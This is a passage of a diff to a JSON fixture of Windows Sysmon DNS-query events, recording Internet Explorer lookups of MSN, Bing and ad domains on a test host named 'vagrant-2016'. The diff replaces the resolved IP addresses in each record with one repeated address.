Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:06.051902900Z'/\u003e\u003cEventRecordID\u003e167\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.056\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eimg-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1834.dspg2.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event" @@ -5953,7 +5953,7 @@ "ProcessId": "2736", "QueryName": "static-entertainment-eus-s-msn-com.akamaized.net", "QueryStatus": "0", - "QueryResults": "type: 5 a1505.g2.akamai.net;::ffff:23.50.53.194;::ffff:23.50.53.186;", + "QueryResults": "type: 5 a1505.g2.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:06.064" }, 
@@ -5974,7 +5974,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049319700Z'/\u003e\u003cEventRecordID\u003e168\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.064\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic-entertainment-eus-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1505.g2.akamai.net;::ffff:23.50.53.194;::ffff:23.50.53.186;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049319700Z'/\u003e\u003cEventRecordID\u003e168\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.064\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic-entertainment-eus-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1505.g2.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" } }, { 
@@ -5983,7 +5983,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049334900Z'/\u003e\u003cEventRecordID\u003e169\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.178\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eradarmaps.weather.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 radarmaps.weather.microsoft.com.edgekey.net;type: 5 e15275.g.akamaiedge.net;::ffff:23.217.149.91;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049334900Z'/\u003e\u003cEventRecordID\u003e169\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.178\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eradarmaps.weather.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 radarmaps.weather.microsoft.com.edgekey.net;type: 5 e15275.g.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" }, "winlog": { "event_id": "22", @@ -6006,7 +6006,7 @@ "ProcessId": "2736", "QueryName": "radarmaps.weather.microsoft.com", "QueryStatus": "0", - "QueryResults": "type: 5 radarmaps.weather.microsoft.com.edgekey.net;type: 5 e15275.g.akamaiedge.net;::ffff:23.217.149.91;" + "QueryResults": "type: 5 radarmaps.weather.microsoft.com.edgekey.net;type: 5 e15275.g.akamaiedge.net;::ffff:89.160.20.156;" }, "process": { "thread": { 
@@ -6026,7 +6026,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049349000Z'/\u003e\u003cEventRecordID\u003e170\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.455\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic-entertainment-eus-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1505.g2.akamai.net;::ffff:23.50.53.194;::ffff:23.50.53.186;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049349000Z'/\u003e\u003cEventRecordID\u003e170\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.455\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic-entertainment-eus-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1505.g2.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" }, @@ -6049,7 +6049,7 @@ "ProcessId": "356", "QueryName": "static-entertainment-eus-s-msn-com.akamaized.net", "QueryStatus": "0", - "QueryResults": "type: 5 a1505.g2.akamai.net;::ffff:23.50.53.194;::ffff:23.50.53.186;", + "QueryResults": "type: 5 a1505.g2.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:06.455" }, 
@@ -6081,7 +6081,7 @@ "ProcessId": "2736", "QueryName": "tag.sp.advertising.com", "QueryStatus": "0", - "QueryResults": "type: 5 cs747173190.wac.omegacdn.net;::ffff:152.195.32.163;", + "QueryResults": "type: 5 cs747173190.wac.omegacdn.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:06.494", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" 
@@ -6097,7 +6097,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049364200Z'/\u003e\u003cEventRecordID\u003e171\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.494\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etag.sp.advertising.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cs747173190.wac.omegacdn.net;::ffff:152.195.32.163;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049364200Z'/\u003e\u003cEventRecordID\u003e171\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.494\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etag.sp.advertising.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cs747173190.wac.omegacdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -6116,7 +6116,7 @@ "ProcessId": "2736", "QueryName": "www.bing.com", "QueryStatus": "0", - "QueryResults": "type: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 dual-a-0001.a-msedge.net;::ffff:204.79.197.200;::ffff:13.107.21.200;" + "QueryResults": "type: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 dual-a-0001.a-msedge.net;::ffff:89.160.20.156;::ffff:89.160.20.156;" }, "user": { "identifier": "S-1-5-18" 
@@ -6140,7 +6140,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049377200Z'/\u003e\u003cEventRecordID\u003e172\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.567\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 dual-a-0001.a-msedge.net;::ffff:204.79.197.200;::ffff:13.107.21.200;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049377200Z'/\u003e\u003cEventRecordID\u003e172\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.567\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 dual-a-0001.a-msedge.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" } 
@@ -6151,7 +6151,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054270200Z'/\u003e\u003cEventRecordID\u003e173\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.228\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecdn.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 akacdn.doubleverify.com.edgekey.net;type: 5 e17513.d.akamaiedge.net;::ffff:23.52.164.109;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054270200Z'/\u003e\u003cEventRecordID\u003e173\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.228\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecdn.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 akacdn.doubleverify.com.edgekey.net;type: 5 e17513.d.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -6183,7 +6183,7 @@ "ProcessId": "2736", "QueryName": "cdn.doubleverify.com", "QueryStatus": "0", - "QueryResults": "type: 5 akacdn.doubleverify.com.edgekey.net;type: 5 e17513.d.akamaiedge.net;::ffff:23.52.164.109;" + "QueryResults": "type: 5 akacdn.doubleverify.com.edgekey.net;type: 5 e17513.d.akamaiedge.net;::ffff:89.160.20.156;" } } }, 
@@ -6196,7 +6196,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054302600Z'/\u003e\u003cEventRecordID\u003e174\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.357\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecdn3.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cdn.doubleverify.com;type: 5 akacdn.doubleverify.com.edgekey.net;type: 5 e17513.d.akamaiedge.net;::ffff:23.52.164.109;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054302600Z'/\u003e\u003cEventRecordID\u003e174\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.357\u003c/Data\u003e\u003cData 